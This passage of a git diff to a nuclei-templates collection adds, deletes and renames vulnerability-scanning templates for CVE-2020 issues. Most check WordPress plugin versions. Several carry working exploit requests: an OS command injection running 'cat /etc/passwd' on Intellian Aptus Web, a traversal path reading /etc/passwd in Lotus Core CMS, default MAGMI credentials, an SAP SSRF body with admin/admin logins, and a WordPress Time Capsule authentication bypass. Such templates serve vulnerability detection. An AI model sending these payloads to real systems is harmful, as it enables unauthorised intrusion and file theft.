compare_versions(version, '<= 2.8.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-36760.yaml b/nuclei-templates/CVE-2020/CVE-2020-36760.yaml deleted file mode 100644 index e4b9f0f32e..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-36760.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-36760 - -info: - name: > - Ocean Extra <=1.6.5 - Cross-Site Request Forgery Bypass - author: topscoder - severity: medium - description: > - The Ocean Extra plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.5]. This is due to missing or incorrect nonce validation on the add_core_extensions_bundle_validation() function. This makes it possible for unauthenticated attackers to validate extension bundles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/eb3ef121-13ea-4e42-90c1-1f4bd31ebbcf?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N - cvss-score: 4.3 - cve-id: CVE-2020-36760 - metadata: - fofa-query: "wp-content/plugins/ocean-extra/" - google-query: inurl:"/wp-content/plugins/ocean-extra/" - shodan-query: 'vuln:CVE-2020-36760' - tags: cve,wordpress,wp-plugin,ocean-extra,medium - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "ocean-extra" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 1.6.6') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-5777.yaml b/nuclei-templates/CVE-2020/CVE-2020-5777.yaml new file mode 100644 index 0000000000..4073d2b145 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-5777.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-5777 + +info: + name: Remote Auth Bypass in MAGMI (Magento Mass Importer) Plugin <= v0.7.23 + author: dwisiswant0 + severity: critical + description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. + reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35 + tags: cve,cve2020,magmi,magento,auth,bypass,plugin + + # Response code 503 indicates a potential successful "Too many connections" error + # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php + # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=) + # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5777 + cwe-id: CWE-287 + +requests: + - raw: + - | + GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1 + Host: {{Hostname}} + Connection: close + + matchers-condition: and + matchers: + - type: word + words: + - "Too many connections" + part: body + - type: status + status: + - 503 diff --git a/nuclei-templates/CVE-2020/CVE-2020-6308.yaml b/nuclei-templates/CVE-2020/CVE-2020-6308.yaml deleted file mode 100644 index 4dc92d511d..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-6308.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2020-6308 - -info: - name: Unauthenticated Blind SSRF in SAP - author: madrobot - severity: medium - reference: https://github.com/InitRoot/CVE-2020-6308-PoC - tags: cve,cve2020,sap,ssrf,oast,blind - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2020-6308 - cwe-id: CWE-918 - description: "SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability." - -requests: - - method: POST - path: - - '{{BaseURL}}/AdminTools/querybuilder/logon?framework=' - - body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp - - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" diff --git a/nuclei-templates/CVE-2020/cve-2020-6637.yaml b/nuclei-templates/CVE-2020/CVE-2020-6637.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-6637.yaml rename to nuclei-templates/CVE-2020/CVE-2020-6637.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-6859.yaml b/nuclei-templates/CVE-2020/CVE-2020-6859.yaml new file mode 100644 index 0000000000..0dfbb3c4f8 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-6859.yaml @@ -0,0 +1,58 @@ +id: CVE-2020-6859 + +info: + name: > + Ultimate Member <= 2.1.2 - Insecure Direct Object Reference + author: topscoder + severity: medium + description: > + Multiple Insecure Direct Object Reference vulnerabilities in includes/core/class-files.php in the Ultimate Member plugin through 2.1.2 for WordPress allow remote attackers to change other users' profiles and cover photos via a modified user_id parameter. This is related to ajax_image_upload and ajax_resize_image. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/65a0033d-2266-429c-aab2-80bd46c93b91?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2020-6859 + metadata: + fofa-query: "wp-content/plugins/ultimate-member/" + google-query: inurl:"/wp-content/plugins/ultimate-member/" + shodan-query: 'vuln:CVE-2020-6859' + tags: cve,wordpress,wp-plugin,ultimate-member,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-member/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-member" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-7961.yaml b/nuclei-templates/CVE-2020/CVE-2020-7961.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7961.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7961.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7980.yaml b/nuclei-templates/CVE-2020/CVE-2020-7980.yaml deleted file mode 100644 index b3a656ea66..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7980.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2020-7980 - -info: - name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution - author: ritikchaddha - severity: critical - description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.' - impact: | - Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. - remediation: | - Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24). - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 - - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html - - https://github.com/Xh4H/Satellian-CVE-2020-7980 - - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html - - https://github.com/0xT11/CVE-POC - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-7980 - cwe-id: CWE-78 - epss-score: 0.97015 - epss-percentile: 0.99726 - cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: intelliantech - product: aptus_web - shodan-query: http.title:"Intellian Aptus Web" - tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech - -http: - - raw: - - | - POST /cgi-bin/libagent.cgi?type=J HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Cookie: ctr_t=0; sid=123456789 - - {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1} - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 -# digest: 490a00463044022031d1966241ed308968ef852360775530e3798312c51bffd3e2011ddff009f30d0220601bed4b817baee1e1404f921e52a663759eec3f11e4a03015b7cb839fa416e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8163.yaml b/nuclei-templates/CVE-2020/CVE-2020-8163.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8163.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8163.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8436.yaml b/nuclei-templates/CVE-2020/CVE-2020-8436.yaml deleted file mode 100644 index f3c039fe53..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8436.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-8436 - -info: - name: > - RegistrationMagic – Custom Registration Forms, User Registration and User Login Plugin <= 4.6.0.1 - Cross-Site Scripting - author: topscoder - severity: medium - description: > - XSS was discovered in the RegistrationMagic plugin 4.6.0.1 for WordPress via the rm_form_id, rm_tr, or form_name parameter. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/d46f8e8a-80cb-4407-ac07-f4c93be691b6?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-8436 - metadata: - fofa-query: "wp-content/plugins/custom-registration-form-builder-with-submission-manager/" - google-query: inurl:"/wp-content/plugins/custom-registration-form-builder-with-submission-manager/" - shodan-query: 'vuln:CVE-2020-8436' - tags: cve,wordpress,wp-plugin,custom-registration-form-builder-with-submission-manager,medium - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/custom-registration-form-builder-with-submission-manager/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "custom-registration-form-builder-with-submission-manager" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 4.6.0.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8641.yaml b/nuclei-templates/CVE-2020/CVE-2020-8641.yaml new file mode 100644 index 0000000000..2224f1fcb7 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-8641.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-8641 + +info: + name: Lotus Core CMS 1.0.1 - Local File Inclusion + author: 0x_Akoko + severity: high + tags: cve,cve2020,lfi,lotus + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-8641 + - https://cxsecurity.com/issue/WLB-2020010234 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8641 + cwe-id: CWE-22 + description: "Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter." + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8654.yaml b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml new file mode 100644 index 0000000000..9f41122e5c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-8654 + +info: + name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution + author: praetorian-thendrickson + severity: high + description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary SQL queries or remote code on the affected system. + remediation: | + Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities. + reference: + - https://github.com/h4knet/eonrce + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb + - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 + - https://nvd.nist.gov/vuln/detail/CVE-2020-8654 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8654 + cwe-id: CWE-78 + epss-score: 0.04987 + epss-percentile: 0.92656 + cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: eyesofnetwork + product: eyesofnetwork + tags: cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/css/eonweb.css" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version, '< 5.4', '>= 5.1') + + - type: word + part: body + words: + - "EyesOfNetwork" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: version + group: 1 + regex: + - "# VERSION : ([0-9.]+)" + internal: true + part: body +# digest: 4a0a0047304502207ebd6b469ac0bd67dd7bc462fa62ef88bde2a9cb294df7a70aecebfd8f51f913022100be00ea371f5c1dbe5dd0833ee69f20b921c315d38f0cca3ba9d8e3af3b938674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8658.yaml b/nuclei-templates/CVE-2020/CVE-2020-8658.yaml new file mode 100644 index 0000000000..5a0a1f033a --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-8658.yaml @@ -0,0 +1,58 @@ +id: CVE-2020-8658 + +info: + name: > + Htaccess <= 1.8.1 - Cross-Site Request Forgery + author: topscoder + severity: high + description: > + The BestWebSoft Htaccess plugin through 1.8.1 for WordPress allows wp-admin/admin.php?page=htaccess.php&action=htaccess_editor CSRF. The flag htccss_nonce_name passes the nonce to WordPress but the plugin does not validate it correctly, resulting in a wrong implementation of anti-CSRF protection. In this way, an attacker is able to direct the victim to a malicious web page that modifies the .htaccess file, and takes control of the website. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a21df06c-4e56-4625-ae8b-89c9fc046939?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8658 + metadata: + fofa-query: "wp-content/plugins/htaccess/" + google-query: inurl:"/wp-content/plugins/htaccess/" + shodan-query: 'vuln:CVE-2020-8658' + tags: cve,wordpress,wp-plugin,htaccess,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/htaccess/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "htaccess" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8771.yaml b/nuclei-templates/CVE-2020/CVE-2020-8771.yaml deleted file mode 100644 index 192592ff42..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8771.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2020-8771 -info: - name: WordPress Time Capsule < 1.21.16 - Authentication Bypass - author: princechaddha - severity: critical - description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts. - reference: - - https://github.com/SECFORCE/WPTimeCapsulePOC - - https://nvd.nist.gov/vuln/detail/CVE-2020-8771 - - https://wpvulndb.com/vulnerabilities/10010 - - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8771 - cwe-id: CWE-287 - tags: cve,cve2020,wordpress,wp-plugin -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: close - Accept: */* - - IWP_JSON_PREFIX - - | - GET /wp-admin/index.php HTTP/1.1 - Host: {{Hostname}} - Connection: close - Accept: */* - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - words: - - '